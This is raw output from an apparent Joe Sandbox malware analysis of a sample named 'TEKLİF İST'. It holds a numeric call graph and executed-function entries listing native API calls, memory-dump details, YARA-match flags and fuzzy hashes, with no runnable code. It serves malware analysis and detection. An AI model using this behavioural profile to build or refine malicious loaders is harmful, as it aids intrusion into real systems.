LdrLoadDll 96145->96146 96147 41aebc 96146->96147 96147->95931 96149 41af30 LdrLoadDll 96148->96149 96150 419eac 96149->96150 96179 1b82df0 LdrInitializeThunk 96150->96179 96151 419ec3 96151->95852 96153->95928 96155 41a52c NtAllocateVirtualMemory 96154->96155 96156 41af30 LdrLoadDll 96154->96156 96155->96033 96156->96155 96158 41cf10 96157->96158 96159 41cf16 96157->96159 96158->96039 96160 41bf60 2 API calls 96159->96160 96161 41cf3c 96160->96161 96161->96039 96163 41cfc5 96162->96163 96164 41cffd 96162->96164 96165 41bf60 2 API calls 96163->96165 96164->96044 96166 41cfda 96165->96166 96167 41bd90 2 API calls 96166->96167 96167->96164 96168->96050 96169->96052 96170->96054 96171->96057 96172->96036 96174 41ac1b 96173->96174 96175 414e50 LdrLoadDll 96174->96175 96176 41ac3b 96175->96176 96177 414e50 LdrLoadDll 96176->96177 96178 41ace7 96176->96178 96177->96178 96178->96071 96178->96178 96179->96151 96181 1b82c1f LdrInitializeThunk 96180->96181 96182 1b82c11 96180->96182 96181->95937 96182->95937 96184 41a65c RtlFreeHeap 96183->96184 96185 41af30 LdrLoadDll 96183->96185 96184->95941 96185->96184 96187 407eb0 96186->96187 96188 407eab 96186->96188 96189 41bd10 2 API calls 96187->96189 96188->95860 96195 407ed5 96189->96195 96190 407f38 96190->95860 96191 419e90 2 API calls 96191->96195 96192 407f3e 96194 407f64 96192->96194 96196 41a590 2 API calls 96192->96196 96194->95860 96195->96190 96195->96191 96195->96192 96198 41bd10 2 API calls 96195->96198 96202 41a590 96195->96202 96197 407f55 96196->96197 96197->95860 96198->96195 96200 40817e 96199->96200 96201 41a590 2 API calls 96199->96201 96200->95817 96201->96200 96203 41a5ac 96202->96203 96204 41af30 LdrLoadDll 96202->96204 96207 1b82c70 LdrInitializeThunk 96203->96207 96204->96203 96205 41a5c3 96205->96195 96207->96205 96209 41b593 96208->96209 96212 40acf0 96209->96212 96213 40ad14 96212->96213 96214 40ad50 LdrLoadDll 96213->96214 96215 409c5b 96213->96215 96214->96215 96215->95825 96217 40b063 96216->96217 96219 40b0e0 96217->96219 96231 419c60 LdrLoadDll 96217->96231 96219->95830 96221 41af30 LdrLoadDll 96220->96221 96222 40f1bb 96221->96222 96222->95838 96223 41a7a0 96222->96223 96224 41af30 LdrLoadDll 96223->96224 96225 41a7bf LookupPrivilegeValueW 96224->96225 96225->95834 96227 41a24c 96226->96227 96228 41af30 LdrLoadDll 96226->96228 96232 1b82ea0 LdrInitializeThunk 96227->96232 96228->96227 96229 41a26b 96229->95835 96231->96219 96232->96229 96234 40b1f0 96233->96234 96235 40b040 LdrLoadDll 96234->96235 96236 40b204 96235->96236 96236->95772 96238 40ae4d 96237->96238 96239 40ae51 96237->96239 96238->95775 96240 40ae6a 96239->96240 96241 40ae9c 96239->96241 96284 419ca0 LdrLoadDll 96240->96284 96285 419ca0 LdrLoadDll 96241->96285 96243 40aead 96243->95775 96245 40ae8c 96245->95775 96247 40f4a0 3 API calls 96246->96247 96248 4143c6 96247->96248 96248->95777 96250 408a67 96249->96250 96286 4087a0 96250->96286 96253 4087a0 19 API calls 96254 408a8a 96253->96254 96256 408a9d 96254->96256 96304 40f710 10 API calls 96254->96304 96256->95779 96258 41af30 LdrLoadDll 96257->96258 96259 41a4ec 96258->96259 96423 1b82e80 LdrInitializeThunk 96259->96423 96260 40c322 96262 40f4a0 96260->96262 96263 40f4bd 96262->96263 96424 419f90 96263->96424 96266 40f505 96266->95783 96267 419fe0 2 API calls 96268 40f52e 96267->96268 96268->95783 96270 419ffc 96269->96270 96271 41af30 LdrLoadDll 96269->96271 96430 1b82d10 LdrInitializeThunk 96270->96430 96271->96270 96272 40c385 96272->95789 96272->95792 96275 41af30 LdrLoadDll 96274->96275 96276 41a04c 96275->96276 96431 1b82d30 LdrInitializeThunk 96276->96431 96277 40c459 96277->95800 96280 41af30 LdrLoadDll 96279->96280 96281 419e0c 96280->96281 96432 1b82fb0 LdrInitializeThunk 96281->96432 96282 40c4ac 96282->95804 96284->96245 96285->96243 96287 407ea0 4 API calls 96286->96287 96302 4087ba 96287->96302 96288 408a49 96288->96253 96288->96256 96289 408a3f 96290 408160 2 API calls 96289->96290 96290->96288 96293 419ed0 2 API calls 96293->96302 96295 41a460 LdrLoadDll NtClose 96295->96302 96298 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 96298->96302 96301 419df0 2 API calls 96301->96302 96302->96288 96302->96289 96302->96293 96302->96295 96302->96298 96302->96301 96305 419ce0 96302->96305 96308 4085d0 96302->96308 96320 40f5f0 LdrLoadDll NtClose 96302->96320 96321 419d60 LdrLoadDll 96302->96321 96322 419d90 LdrLoadDll 96302->96322 96323 419e20 LdrLoadDll 96302->96323 96324 4083a0 96302->96324 96340 405f60 LdrLoadDll 96302->96340 96304->96256 96306 41af30 LdrLoadDll 96305->96306 96307 419cfc 96306->96307 96307->96302 96309 4085e6 96308->96309 96341 419850 96309->96341 96311 408771 96311->96302 96312 4085ff 96312->96311 96362 4081a0 96312->96362 96314 4086e5 96314->96311 96315 4083a0 11 API calls 96314->96315 96316 408713 96315->96316 96316->96311 96317 419ed0 2 API calls 96316->96317 96318 408748 96317->96318 96318->96311 96319 41a4d0 2 API calls 96318->96319 96319->96311 96320->96302 96321->96302 96322->96302 96323->96302 96325 4083c9 96324->96325 96402 408310 96325->96402 96328 41a4d0 2 API calls 96329 4083dc 96328->96329 96329->96328 96330 408467 96329->96330 96332 408462 96329->96332 96410 40f670 96329->96410 96330->96302 96331 41a460 2 API calls 96333 40849a 96331->96333 96332->96331 96333->96330 96334 419ce0 LdrLoadDll 96333->96334 96335 4084ff 96334->96335 96335->96330 96414 419d20 96335->96414 96337 408563 96337->96330 96338 414a50 8 API calls 96337->96338 96339 4085b8 96338->96339 96339->96302 96340->96302 96342 41bf60 2 API calls 96341->96342 96343 419867 96342->96343 96369 409310 96343->96369 96345 419882 96346 4198c0 96345->96346 96347 4198a9 96345->96347 96349 41bd10 2 API calls 96346->96349 96348 41bd90 2 API calls 96347->96348 96350 4198b6 96348->96350 96351 4198fa 96349->96351 96350->96312 96352 41bd10 2 API calls 96351->96352 96353 419913 96352->96353 96359 419bb4 96353->96359 96375 41bd50 96353->96375 96356 419ba0 96357 41bd90 2 API calls 96356->96357 96358 419baa 96357->96358 96358->96312 96360 41bd90 2 API calls 96359->96360 96361 419c09 96360->96361 96361->96312 96363 40829f 96362->96363 96364 4081b5 96362->96364 96363->96314 96364->96363 96365 414a50 8 API calls 96364->96365 96366 408222 96365->96366 96367 41bd90 2 API calls 96366->96367 96368 408249 96366->96368 96367->96368 96368->96314 96370 409335 96369->96370 96371 40acf0 LdrLoadDll 96370->96371 96372 409368 96371->96372 96374 40938d 96372->96374 96378 40cf20 96372->96378 96374->96345 96396 41a550 96375->96396 96379 40cf4c 96378->96379 96380 41a1b0 LdrLoadDll 96379->96380 96381 40cf65 96380->96381 96382 40cf6c 96381->96382 96389 41a1f0 96381->96389 96382->96374 96386 40cfa7 96387 41a460 2 API calls 96386->96387 96388 40cfca 96387->96388 96388->96374 96390 41a20c 96389->96390 96391 41af30 LdrLoadDll 96389->96391 96395 1b82ca0 LdrInitializeThunk 96390->96395 96391->96390 96392 40cf8f 96392->96382 96394 41a7e0 LdrLoadDll 96392->96394 96394->96386 96395->96392 96397 41af30 LdrLoadDll 96396->96397 96398 41a56c 96397->96398 96401 1b82f90 LdrInitializeThunk 96398->96401 96399 419b99 96399->96356 96399->96359 96401->96399 96403 408328 96402->96403 96404 408343 96403->96404 96405 40acf0 LdrLoadDll 96403->96405 96406 414e50 LdrLoadDll 96404->96406 96405->96404 96407 408353 96406->96407 96408 40835c PostThreadMessageW 96407->96408 96409 408370 96407->96409 96408->96409 96409->96329 96411 40f683 96410->96411 96417 419e60 96411->96417 96415 419d3c 96414->96415 96416 41af30 LdrLoadDll 96414->96416 96415->96337 96416->96415 96418 41af30 LdrLoadDll 96417->96418 96419 419e7c 96418->96419 96422 1b82dd0 LdrInitializeThunk 96419->96422 96420 40f6ae 96420->96329 96422->96420 96423->96260 96425 41af30 LdrLoadDll 96424->96425 96426 419fac 96424->96426 96425->96426 96429 1b82f30 LdrInitializeThunk 96426->96429 96427 40f4fe 96427->96266 96427->96267 96429->96427 96430->96272 96431->96277 96432->96282 96435 1b82ad0 LdrInitializeThunk

                                                                                                              Executed Functions

                                                                                                              Function 0041A3DB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55filenativeCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileRead
                                                                                                              • String ID: 1JA$rMA$rMA
                                                                                                              • API String ID: 2738559852-782607585
                                                                                                              • Opcode ID: 7aaaa16702adae6d23ede2d680456887a62317e53decf251faaf94379e42fb99
                                                                                                              • Instruction ID: 40098347e2ccfe5138c34a84cead36b309c134ff29b5ac5e9c21c1f122b9f0a0
                                                                                                              • Opcode Fuzzy Hash: 7aaaa16702adae6d23ede2d680456887a62317e53decf251faaf94379e42fb99
                                                                                                              • Instruction Fuzzy Hash: BD0129B2211104ABCB14DF99CC85EEB77A9EF8C364F158649FA1D97251C630E912CBA1
                                                                                                              Function 0041A3E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 8 41a3e0-41a3f6 9 41a3fc-41a429 NtReadFile 8->9 10 41a3f7 call 41af30 8->10 10->9
                                                                                                              APIs
                                                                                                              • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileRead
                                                                                                              • String ID: 1JA$rMA$rMA
                                                                                                              • API String ID: 2738559852-782607585
                                                                                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                              • Instruction ID: c75c44bd16ed9a046d03b4490adc68ebadf214b0f3589fd2ba36fb57c0fad8bd
                                                                                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                              • Instruction Fuzzy Hash: 95F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                                                                              Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 263 40acf0-40ad0c 264 40ad14-40ad19 263->264 265 40ad0f call 41cc20 263->265 266 40ad1b-40ad1e 264->266 267 40ad1f-40ad2d call 41d040 264->267 265->264 270 40ad3d-40ad4e call 41b470 267->270 271 40ad2f-40ad3a call 41d2c0 267->271 276 40ad50-40ad64 LdrLoadDll 270->276 277 40ad67-40ad6a 270->277 271->270 276->277
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                              • Instruction ID: 667dcf47c4413345b20473d406be44d3d8b7ebea9a3b2269cd40777f9644ce6e
                                                                                                              • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                              • Instruction Fuzzy Hash: 79015EB5D0020DBBDB10EBA1DC42FDEB3799F54308F0045AAA908A7281F638EB54CB95
                                                                                                              Function 0041A330 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 278 41a330-41a381 call 41af30 NtCreateFile
                                                                                                              APIs
                                                                                                              • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                              • Instruction ID: 7ed6e6cb708c972561b0f9910f559a39af1ab3cc862b6eef20835abd22e26781
                                                                                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                              • Instruction Fuzzy Hash: C4F0BDB2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E851CBA4
                                                                                                              Function 0041A50F Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 281 41a50f-41a54d call 41af30 NtAllocateVirtualMemory
                                                                                                              APIs
                                                                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 2167126740-0
                                                                                                              • Opcode ID: 010e29acb7f9fd415614937ca605b5bfb6e9e985f7aa4afa3a131315dc63b2b1
                                                                                                              • Instruction ID: b6d20d9d9baca4ad67b6d83bb7e3b47810d24a1c747aa2bf8ffe25eb9f604490
                                                                                                              • Opcode Fuzzy Hash: 010e29acb7f9fd415614937ca605b5bfb6e9e985f7aa4afa3a131315dc63b2b1
                                                                                                              • Instruction Fuzzy Hash: 99F01CB5211108AFCB14DF99CC81EEB77A9AF88354F15824DFE0997241C630E811CBA0
                                                                                                              Function 0041A510 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 284 41a510-41a526 285 41a52c-41a54d NtAllocateVirtualMemory 284->285 286 41a527 call 41af30 284->286 286->285
                                                                                                              APIs
                                                                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 2167126740-0
                                                                                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                              • Instruction ID: 8b47746d7073478515a2f8fd1fb94e42dcc9ffa91ac9ff965dae3841ed3a313c
                                                                                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                              • Instruction Fuzzy Hash: 9CF015B2210208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                                                                                              Function 0041A460 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                              • Instruction ID: e9450f8bec15428cdd91297f97b7848412804bda5c7d31b3f0e5b01193c95e83
                                                                                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                              • Instruction Fuzzy Hash: 3CD01776211214ABD710EB99CC85EE77BACEF48764F15449ABA189B242C530FA1186E0
                                                                                                              Function 01B82BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: e6ba8d57b28f2f1e772721eefddaddbdf42b3370b98e6281db18c85892b7d060
                                                                                                              • Instruction ID: 0c9aa786c764ac7fea5567eee4ccf926e56ab11a7faa62e33c549eeff6b48f4f
                                                                                                              • Opcode Fuzzy Hash: e6ba8d57b28f2f1e772721eefddaddbdf42b3370b98e6281db18c85892b7d060
                                                                                                              • Instruction Fuzzy Hash: 6890023220140C02D6847158440464A000597D2301F95C065A0029655DCB198B5A77A5
                                                                                                              Function 01B82B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: bd2da079dd82bcab92c4349cb7325c4d2b82658613ba05fc9781c5eee9416425
                                                                                                              • Instruction ID: bfd0cc7eb223c07f5d2a45d173b871eb5ffcbfa23c47287eb0336a0880ebce2f
                                                                                                              • Opcode Fuzzy Hash: bd2da079dd82bcab92c4349cb7325c4d2b82658613ba05fc9781c5eee9416425
                                                                                                              • Instruction Fuzzy Hash: C990026220240403460971584414616400A97E1201B55C071E1018591DC62989926229
                                                                                                              Function 01B82AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 0b22dc914fe22732028c1d8db2f1281ace86609416c196b7b62db438f8b1129e
                                                                                                              • Instruction ID: 757d94789f7288420d8c81e784e0363e20bec9d873ea499aa67ca34cc95a799d
                                                                                                              • Opcode Fuzzy Hash: 0b22dc914fe22732028c1d8db2f1281ace86609416c196b7b62db438f8b1129e
                                                                                                              • Instruction Fuzzy Hash: 4B900226211404030609B5580704507004697D6351355C071F1019551CD72589625225
                                                                                                              Function 01B82DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 1ebe32ca9f43946817b268c028187dd283bcc732d241809173037820528a9f36
                                                                                                              • Instruction ID: f6d7c45fbe54666d5d3fc244a554f099f38ae35563c4e968d28e089e069d4cb0
                                                                                                              • Opcode Fuzzy Hash: 1ebe32ca9f43946817b268c028187dd283bcc732d241809173037820528a9f36
                                                                                                              • Instruction Fuzzy Hash: B790023220140813D61571584504707000997D1241F95C462A0428559DD75A8A53A225
                                                                                                              Function 01B82DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 7b0a229f86679f0c73f5b0e81e19962713b23065e3ee09568684ba0b7b6c69a3
                                                                                                              • Instruction ID: a86cae5fbe2678cc0607f02921c73359d01697b6216d0ccee2bdcde4cea323ba
                                                                                                              • Opcode Fuzzy Hash: 7b0a229f86679f0c73f5b0e81e19962713b23065e3ee09568684ba0b7b6c69a3
                                                                                                              • Instruction Fuzzy Hash: FD900222242445525A49B15844045074006A7E1241795C062A1418951CC62A9957D725
                                                                                                              Function 01B82D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: a589971c855775d53e7cec8a369efebe75869100b4bbf60ac71e3af15bdf0432
                                                                                                              • Instruction ID: 436f3f53acc8af40966717556495d5940661ea06770e98037e9739f7d1cb14dc
                                                                                                              • Opcode Fuzzy Hash: a589971c855775d53e7cec8a369efebe75869100b4bbf60ac71e3af15bdf0432
                                                                                                              • Instruction Fuzzy Hash: 5D90022230140403D644715854186064005E7E2301F55D061E0418555CDA1989575326
                                                                                                              Function 01B82D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 1235532dc86de27c5dd0530b6a31bd116d7307de2b772eb03283dd3d80773d3f
                                                                                                              • Instruction ID: 5fd58dd63d6f501504cf551154da378f24700f36797061e8d0b7a8f842be9a1e
                                                                                                              • Opcode Fuzzy Hash: 1235532dc86de27c5dd0530b6a31bd116d7307de2b772eb03283dd3d80773d3f
                                                                                                              • Instruction Fuzzy Hash: 8190022A21340402D6847158540860A000597D2202F95D465A0019559CCA19896A5325
                                                                                                              Function 01B82CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 368baae1d89094c030467479926c32257008fa6c2eab471abb79620b226bf48d
                                                                                                              • Instruction ID: c0c9d185403fbab38c0ed2e2aca018117cf7f3e3a61a52d39536e597c23b990b
                                                                                                              • Opcode Fuzzy Hash: 368baae1d89094c030467479926c32257008fa6c2eab471abb79620b226bf48d
                                                                                                              • Instruction Fuzzy Hash: F790023220140802D60475985408646000597E1301F55D061A5028556EC76989926235
                                                                                                              Function 01B82C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 8bbae2818a6db2a47d3f3dc3455605ac03b8c287d64dcd557c82a83fdc8ba4b7
                                                                                                              • Instruction ID: a3c8bd44f74c097b263600d75f4be387c0d4e4a267ba4726ee6c41f5474f6633
                                                                                                              • Opcode Fuzzy Hash: 8bbae2818a6db2a47d3f3dc3455605ac03b8c287d64dcd557c82a83fdc8ba4b7
                                                                                                              • Instruction Fuzzy Hash: 2E90023220148C02D6147158840474A000597D1301F59C461A4428659DC79989927225
                                                                                                              Function 01B82FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 8f2a4256e5523cd80b0d0311013a3c14fcf4a37f60b42f5cdce55f3f1edab6e5
                                                                                                              • Instruction ID: 8e3752339f109f69fe1752cc2e59316976b9a6e673cf433d5a722d78acd4d9be
                                                                                                              • Opcode Fuzzy Hash: 8f2a4256e5523cd80b0d0311013a3c14fcf4a37f60b42f5cdce55f3f1edab6e5
                                                                                                              • Instruction Fuzzy Hash: 63900222601404424644716888449064005BBE2211755C171A099C551DC65D89665769
